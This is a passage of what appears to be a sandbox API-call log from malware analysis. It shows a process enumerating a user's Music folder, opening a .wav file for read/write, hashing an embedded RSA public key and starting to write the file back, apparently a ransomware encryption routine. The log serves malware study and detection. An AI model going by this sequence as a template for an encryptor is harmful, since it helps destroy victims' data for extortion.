dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.238] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0199.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f348 | out: hHeap=0x620000) returned 1 [0199.238] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.239] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.239] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.239] PathFindFileNameW (pszPath="") returned="" [0199.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.239] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\*" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fd1d620, ftCreationTime.dwHighDateTime=0x1d897df, ftLastAccessTime.dwLowDateTime=0x9cde2fd0, ftLastAccessTime.dwHighDateTime=0x1d8a22b, ftLastWriteTime.dwLowDateTime=0x9cde2fd0, ftLastWriteTime.dwHighDateTime=0x1d8a22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0199.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.241] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fd1d620, ftCreationTime.dwHighDateTime=0x1d897df, ftLastAccessTime.dwLowDateTime=0x9cde2fd0, ftLastAccessTime.dwHighDateTime=0x1d8a22b, ftLastWriteTime.dwLowDateTime=0x9cde2fd0, ftLastWriteTime.dwHighDateTime=0x1d8a22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.241] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995c5f0, ftCreationTime.dwHighDateTime=0x1d8992d, ftLastAccessTime.dwLowDateTime=0x18829f0, ftLastAccessTime.dwHighDateTime=0x1d89db2, ftLastWriteTime.dwLowDateTime=0x18829f0, ftLastWriteTime.dwHighDateTime=0x1d89db2, nFileSizeHigh=0x0, nFileSizeLow=0xcbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-xht.wav", cAlternateFileName="")) returned 1 [0199.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0199.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.242] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\-xht.wav") returned=".wav" [0199.242] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\-xht.wav" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\-xht.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.244] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=3261) returned 1 [0199.245] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.249] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xc97, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.249] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.252] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.252] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xcbd, lpOverlapped=0x0) returned 1 [0199.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.252] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.254] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.254] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.254] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.254] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.254] GetLastError () returned 0x0 [0199.254] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.254] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.254] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.254] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.255] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xcc0) returned 0x2e902a0 [0199.255] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f348 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0199.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f390 [0199.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0199.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.256] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e90f68 [0199.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90f68 | out: hHeap=0x620000) returned 1 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea30f8 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.259] GetCurrentThreadId () returned 0x66c [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea63d0 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.260] GetCurrentThreadId () returned 0x66c [0199.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3188 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31a0 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3140 [0199.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e90f68 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e91180 [0199.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90f68 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91180 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f390 | out: hHeap=0x620000) returned 1 [0199.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.271] WriteFile (in: hFile=0x510, lpBuffer=0x2e902a0*, 